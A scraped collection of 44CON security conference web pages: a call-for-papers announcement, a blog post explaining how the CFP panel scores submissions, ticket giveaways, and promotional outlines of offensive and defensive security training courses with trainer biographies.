          #####EOF##### 44CON 2018 CFP Is Open! – 44CON

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.


          #####EOF##### Early Bird Tickets Sold Out! – 44CON

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          #####EOF##### Steelcon Ticket winners – 44CON

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          #####EOF##### Mastering Container Security – 44CON

          Mastering Container Security

          Presented By: Rory McCune

          Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

          This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

          We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

          The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Guidance on how to effectively use Docker to build secure and performant container images.
          • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
          • Hardening guidance for Docker Engine instances.
          • Introduction to container clustering and orchestration with Docker Swarm.
          • Secure configuration and attacks of Kubernetes clusters.
          • Techniques for effectively assessing the security of container images.

          Course Outline

          Day 1:

          • Docker Basics
          • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
          • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
          • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
          • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
          • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
          • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

          Day 2:

          • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
          • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
          • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
          • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

          Target Audience

          Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

          What to Bring

          • Working laptop where you have administrator rights

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • SSH client capable of using key based logins

          Students will be provided with

          Copies of the course including all exercises and Virtual Machine images used during the course.

          About the Trainer

          LEAD INSTRUCTOR – Rory McCune @raesene

          Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

          He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

          Book your 44CON 2019 training course now!

          #####EOF##### 44CON 2018 – 44CON

          44CON 2018

          44CON 2018 will take place from the 12th to the 14th of September 2018 at the ILEC Conference Centre. It will kick off on Wednesday 12th September at 6:30pm with our Community Evening. Entry to the Community Evening is free but you will have to register beforehand. Registration will open at 6pm.

           

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass on to those submitting on request. On average we get between 200 and 400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop and your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes on the first submissions coming in, and voting slowly drops off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          #####EOF##### 44CON 2014 Training – 44CON

          44CON 2014 Training

          All training courses are run on the 9th & 10th September 2014 at the Millennium Gloucester Conference Centre in Kensington, London.

          The Web Application Hacker’s Handbook, 2nd Edition: LIVE!

          MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the deepest and most comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days


          The Advanced Exploit Laboratory

          Saumil Shah

          The Advanced Exploit Laboratory is an all new intermediate to advanced level class, for those curious to dig deeper into the art and craft of software exploitation. We begin with a quick overview of stack overflows, exception handler abuse, memory overwrites, and other core concepts. The class then moves on to use-after-free bugs and vtable overwrites, especially applicable to browser and PDF exploits. The class also spends a lot of time focusing on defeating modern day exploit mitigation techniques like DEP and ASLR using Return Oriented Programming (ROP).

          To add extra punch, we are introducing an all new section on practical exploitation of browsers on the Android platform and working with ARM exploits. This is one class you don’t want to miss!

          The Exploit Laboratory requires a lot of hands on work. Lab examples used in this class cover Linux, Windows and Android platforms, featuring popular third party applications and products instead of simulated lab exercises.

          As with the popular Exploit Laboratory, all topics are delivered in a down-to-earth, learn-by-example methodology. The same trainers who brought you The Exploit Laboratory for over eight years have been working hard in putting together advanced material based on past feedback.

          Course Length: 2 days

          This is the 100% genuine Exploit Lab! No imitations, no rip-offs


          Mobile App Security Boot Camp

          Dominic Chell & Robert Miller

          The Mobile App Security Boot Camp is an all-new novice to advanced level class covering both Android and iOS App security. As a new course for 2014, we provide the most comprehensive and cutting edge guide to mobile App security that is currently available, including in depth coverage of iOS 7!

          The class provides attendees with details on platform security protections, teaches them how to build a test environment and deep dives into exploitation of mobile application vulnerabilities.

          This 2-day class is provided as a partnership between MDSec and MWR InfoSecurity, pioneers in mobile security.

          Course Length: 2 days


          Hacking PDF

          Didier Stevens

          PDF exploits and malicious PDF documents have been on the radar for several years now. But do you know how to detect them? And how they are constructed?

          This training will teach you how to analyze PDF files and create your own PDF hacks: PDF files that execute code, but also PDF documents that embed, obfuscate and hide all types of content. Didier Stevens will teach you how to use his Python tools to analyze PDF documents and to create your own PDF documents from scratch. With a bit of knowledge of the Python programming language, Didier Stevens will teach you how to use his PDF Python module to create all sorts of “interesting” PDF files. And for good measure, we also throw in a bit of shellcode programming. Didier Stevens will reveal shellcode he specially designed for PDF files. This shellcode has never been released publicly.

          This is not a training on exploit development, but we will see with several exercises how exploits need to be packaged in PDF files. We focus on the PDF language, not on reversing PDF readers.

          Course Length: 2 days


          Network Analysis with the Bro Platform

          Liam Randall

          The Bro Platform is the National Science Foundation funded next generation network analysis system with use cases in security, network monitoring, DLP and more. The Bro Platform provides security teams with logs of highly structured data about their networks, a Turing complete scripting language through which they can interact with real-time stateful network events, and flexible open interfaces through which Bro can be programmed. Pragmatically able to interface with the entire network stack, Bro includes support for most common TCP/IP protocols, IPv6, tunneled traffic, SSL, and more.

          Course Length: 2 days

           

          #####EOF##### marizelfourie – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-Secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.


          The tour will last around 2 hours and cover the full museum collection, from the Colossus and war code breaking machines to the history of computing from 1940 to the start of the smartphone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, and Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands-on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at the Royal College of Physicians in London. Tickets are available now – www.crestandiisp.com.

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          44CON Training

          As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

          Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

          2019 Schedule

          June Training: 6th – 7th June 2019

          We have 3 training courses available in June, each two days in length. Training will take place at the Novotel London West in Hammersmith:

          Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

          September Training: 9th – 11th September 2019

          Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

          Training will take place at the Novotel London West in Hammersmith:

          More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

          December Training: 2nd – 6th December 2019

          Our call for training is now closed. Courses will be listed in due course.

          Please contact us if you’d like to deliver training in London in March 2020.

          44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

          Speakers – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          Bug Hunting Millionaire: Mastering Web Attacks with Full-Stack Exploitation

          Presented By: Dawid Czagan

          HackerOne bug hunters have earned $20 million in bug bounties until 2017 and they are expected to earn $100 million by the end of 2020. Some of HackerOne’s customers include the United States Department of Defense, General Motors, Uber, Twitter, and Yahoo. It clearly shows where the challenges and opportunities are for you in the upcoming years. What you need is solid technical training by one of the Top 10 HackerOne bug hunters.

          Modern web applications are complex and it’s all about full-stack nowadays. That’s why you need to dive into full-stack exploitation if you want to master web attacks and maximize your payouts. Say ‘No’ to classical web application hacking. Join this unique hands-on training and become a full‑stack exploitation master.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,500 (inc VAT). Book your place in our shop now.

          Learning Objectives

          After completing this training, you will have learned about:

          • REST API hacking
          • AngularJS-based application hacking
          • DOM-based exploitation
          • Bypassing Content Security Policy
          • Server-side request forgery
          • Browser-dependent exploitation
          • DB truncation attack
          • NoSQL injection
          • Type confusion vulnerability
          • Exploiting race conditions
          • Path-relative stylesheet import vulnerability
          • Reflected file download vulnerability
          • Subdomain takeover
          • And more…

          This hands-on training has been very well-received by students around the world. See what students are saying here.

          Target Audience

          Penetration testers, bug hunters, security researchers/consultants

          Student Requirements

          To get the most out of this training, intermediate knowledge of web application security is needed. Students should be familiar with common web application vulnerabilities and have experience in using a proxy, such as Burp Suite Proxy, or similar, to analyze or modify the traffic.

          What to Bring

          Students will need a laptop with 64-bit operating system, at least 4 GB RAM (8 GB preferred), 35 GB free hard drive space, USB port (2.0 or 3.0), wireless network adapter, administrative access, and ability to turn off AV/firewall.

          Software Requirements

          VMware Player/Fusion installed (64-bit version). Prior to the training, make sure there are no problems with running 64-bit VMs (BIOS settings changes may be needed). Please also make sure that you have Internet Explorer 11 installed on your machine or bring an up-and-running VM with Internet Explorer 11 (you can get it here).

          Students Will Be Provided With

          Students will be handed a VMware image with a specially prepared testing environment to play with the bugs. What’s more, this environment is self-contained and when the training is over, students can take it home (after signing a non-disclosure agreement) to hack again at their own pace.

          Special Bonus

          The ticket price includes FREE access to Dawid Czagan’s 6 online courses:

          • Start Hacking and Making Money Today at HackerOne
          • Keep Hacking and Making Money at HackerOne
          • Case Studies of Award-Winning XSS Attacks: Part 1
          • Case Studies of Award-Winning XSS Attacks: Part 2
          • DOUBLE Your Web Hacking Rewards with Fuzzing (in preparation; to be published soon)
          • How Web Hackers Make BIG MONEY: Remote Code Execution (in preparation; to be published soon)

          About the Trainer

          Dawid Czagan (@dawidczagan) is an internationally recognized security researcher, trainer, and author of online security courses. He is listed among Top 10 Hackers (HackerOne). Dawid Czagan has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter and other companies. Due to the severity of many bugs, he received numerous awards for his findings.

          Dawid Czagan shares his security bug hunting experience in his hands-on trainings “Hacking Web Applications – Case Studies of Award-Winning Bugs in Google, Yahoo, Mozilla and More” and “Bug Hunting Millionaire: Mastering Web Attacks with Full-Stack Exploitation”. He delivered security training courses at key industry conferences such as Hack In The Box (Amsterdam), CanSecWest (Vancouver), 44CON (London), Hack In Paris (Paris), DeepSec (Vienna), HITB GSEC (Singapore), BruCON (Ghent) and for many corporate clients. His students include security specialists from Oracle, Adobe, ESET, ING, Red Hat, Trend Micro, Philips and government sector (recommendations: https://silesiasecuritylab.com/services/training/#opinions).

          Dawid Czagan is a founder and CEO at Silesia Security Lab – a company which delivers specialized security testing and training services. He is also an author of online security courses. To find out about the latest in Dawid Czagan’s work, you are invited to subscribe to his newsletter and follow him on Twitter (@dawidczagan).

          Book your 44CON June 2019 training course now!
